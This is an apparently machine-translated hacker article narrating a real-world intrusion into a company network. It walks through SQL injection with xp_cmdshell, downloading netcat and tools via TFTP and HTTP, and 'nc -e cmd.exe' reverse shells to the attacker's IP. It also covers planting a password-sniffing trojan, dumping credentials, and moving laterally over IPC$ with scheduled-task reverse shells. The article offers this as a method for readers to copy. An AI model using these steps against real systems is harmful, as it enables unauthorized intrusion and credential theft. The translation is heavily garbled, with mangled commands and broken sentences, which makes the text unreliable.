Record a hard intrusion

Author: yonggeer Source: Chaoyang people website published on: 10:54:11

This article has been published in section 3rd of the black line of defense In an extraordinary year of, various vulnerabilities were discovered one after another, and various intrusion techniques emerged. Machines originally fixed in the face of new vulnerabilities have also become weak. Niu found and compiled the Serv-U overflow program. In order to facilitate the improvement of system permissions, nbsi gave full play to SQL injection, and PHP injection became increasingly mature, which of the following experts discovered the upload vulnerability in many scripts is also similar, such as DV, DZ, and other famous forums are also reporting vulnerabilities. Several famous companies are blackmailed, and hacker organizations are fighting for it, virtual Hosts are also suffering from additional concerns. Attack and Defense are like spear and shield. In a sense, attack is defense, and attack is defense! A small loophole can conquer a machine and even occupy the entire internal network. This article takes one machine as a breakthrough, then how to use other machines in the Intranet as a stepping stone, and finally control the target machine (if we say that using a site on one machine to control other sites is called direct bypass, even if I want to use the weakest machine in the same network to achieve the most powerful control machine, I would like to ask for questions. This is a bit better than penetration intrusion. In fact, many cool people are using this method, I am ugly here ). 1. Reverse connection to database machines through SQL injection. The SQL injection vulnerability is detected by nbsi scan, and the SA permission is still applied. Input ipconfig-all using the nbsi DOS command to find that the website address is different from that of the web server, but the gateway is in the same network segment. Run netstat-An to check the port opened by the database server. It is found that many port 1433 are Web server connections, ports and 80 are unavailable! With nbsi's browsing directory feature, no pcAnywhere and SERV-U found on the machine (using them to remotely control, escalate permissions, or guess the password ). The Net start command does not detect anti-virus software or firewall services such as rising star and Kv, and then uses hscan1. 2 and nmap3. 7. Scanning the Internet IP address of the database server did not scan an open port! (It is estimated that the machine is installed with hardware> firewall !) When dealing with the firewall, I even thought of a reverse link. I opened a local TFTP. Using the command, TFTP-I IP get nc.exe was lucky enough to upload an NC, upload a MT using the same method. EXE (mt. EXE is a network management software. According to yy3, it is simply a convenient figure. "But this is really convenient, just 40 k a program, but a collection of nearly 40 types of commands in one. You can also use the FTP command to write the FTP command into a file using the echo command, and finally use ftp-S: filename to download the file. Use NC to listen to port 66 on the local machine. Run the following command: NC-l-P 66. Run the command on the remote machine: NC-e cmd. Exe ip 66 In a short time, a shell will come out (it is still refreshing to run the command here, and it is stuck in nbsi. Sometimes "unexpected data" will appear when executing the command in nbsi ", also broken in the browser, execute _ javasshell % 20 'dos "> http: // www. * ** .com.tw/###/####.asp? Mode = 1 & id = 256; Exec % 20master .. xp_mongoshell % 20 'dos command ';--) Use the net view command to view three machines in total! 2 The content obtained by using the command: Net view // machine name is blank. It seems that the directory is not shared! Ii. Great functions of uploading and listening for Trojans. Use Mt. The Exe-sysinfo command displays the system information, network card information, configuration information, and installed software information of the database service. 3 (only system information is intercepted) Figure 3 It is win2003. No wonder the MT-findpass command does not show the password. It only displays the 2 k password. Use commands MT-netget http: // www. ***. COM/findpass2003.exe (MT-netget <URL> <FILENAME to saved> --- download from HTTP/ftp .) download a local win2003 password-checking software !! No Password Found in memory after running findpass2003.exe! (It seems that the Administrator has logged on! Haha) run the following command: MT-netget http: // www. ***. com/hacan120.rar hscan.rar download an hscan1 file. 2. Use the same method to download an unrar file. Run the following command: unrar.exe x hscan.rar. RAR is extracted to the hscan directory! You can use hacsn1. In version 2, the DOS command is used to scan the Intranet. The command is hscan-H www.target.com-all-ping. After scanning the other two hosts, no weak passwords are found, but many ports are opened in the intranet, such as 135,139,338, 80, etc. Note: After the hscan is complete, a report will be generated and automatically opened in the browser. You should use MT-pslist and MT-pskill to close the browser! Can I use port redirection to direct port 3389 to the database server? MT-redirect <targetip> <targetport> <listenport> ---- TCP port redirector. Failed to use fpipe (after targeting, use the netstat-An command to check whether the client is successful, but it still cannot be accessed on the Internet) which database can this machine use a graphic Trojan with a bounce to control the screen? Practice has proved that the use of air, gray pigeons, and snow have failed! It seems that only DOS-based backdoors can be installed. How can I try APR spoofing? Arpsinffer is unable to install Winpcap in DOS. EXE cannot run! (Later I made a DOS version.) on this machine, nothing except the operating system, database, and win2003 patch was installed. Is there really no way to fix it? At this time, I thought of a Trojan, a hacker written by a female, that is, the reverse connection function and the listening function. What is it? Smart friend, Have you guessed it? She is a famous girl, such as Lei guaner, Wei mingyuan Bo, all-unknown wollf (I like her very much! Haha) Run Wollf-Setup Then, create a reverse link Trojan. I chose to put the IP address of the reverse link in an HTTP space file! After preparation, MT is also used. The Exe-netget command is downloaded to the database server. After running the command, it automatically retrieves the reverse link IP address and port from the files stored in your HTTP space, at this time, you can use the nc-l-P port on the local machine to wait slowly. After a while, the reverse connection will be successful. Enter the password! 4 After entering, execute the command: sniff <LOG_FILE> (she can listen to FTP, SMTP, POP3, and HTTP passwords. After the four passwords pass through the ENI's javasfindpass2003.exe, haven't I found the password yet? At this time, the MT. exe-pskill command is used to stop its database. I do not believe the Administrator will not come! In the wollf environment, execute exit to exit (but the listener is still running. If quit is executed, the listener will not be listened to). I am exhausted and go to bed! When I woke up, the sun was always high. It was so comfortable to sleep late! Check whether there is any valuable information in the reverse connection. first enter the command: sniff_stop to stop the listener. Then, use the GET command in wollf to download the listener file, the gains are not small, as shown in Figure 5: Figure 5 listens to the username and password of port 80 of the fixed Web server. The logon principle is a member! The user name and password of port 21 of a machine and a mail of port 25 of the machine are also monitored, view the IP address and find that it is one of the three machines shown in net view above. It is called "Email web server", and port 80 is also opened during Internet scanning! It seems that this machine has two functions: one is to serve as the mail server, and the other is to open port 80, with the content of a website on it, the content of the main website is on which powerful web server (scanning it on the Internet and only enabling port 80! Which Email web server only opens ports 80,110 and to the Internet?) do not log on! Do not forget the findpass2003 command! 6: I used net user username to check whether this user is an administrator! The password settings are unusual, including letters, numbers, and special characters. administrators generally have a habit of using the same password as the administrators on all machines. It was verified later! After obtaining the username and password, I tried to run the following command on the database server: net use // ip/ADMIN $ passwd/User: username! 3. The mail web server is used as a stepping stone; Can I log on to the email Web server through FTP or Serv-U FTP-server v2.5k? After successful logon, upload a sea top 2005 and NC. EXE up, repeat link 7 Use the IPC Vulnerability (the web server can be successful on this machine! Haha) 1. net use // web server/ADMIN $ password/User: Username Username and password are the username and password provided when you connect to the remote host. 2. Copy X:/nc.exe // web server/ADMIN $ Copy NC to Web Server 3. NET Time // remote host name The current time of the Web server is shown. 3. At // The Web server nc.exe-e cmd.exe 218. ***. ***. 165 99 At, the web server automatically reversely links the NC to port 99 of the even machine. 8 Two minutes later, I finally succeeded. I finally got into which kind of Web server is solid! Page 9: Xyzcmd is used in the reverse shell. The exe tool fails to perform the next logon, that is, it fails when the shell is out of the shell. It seems that it does not support data interaction. The figure is similar to the current website. I hope this method will be helpful to you, whether it is attack or defense !!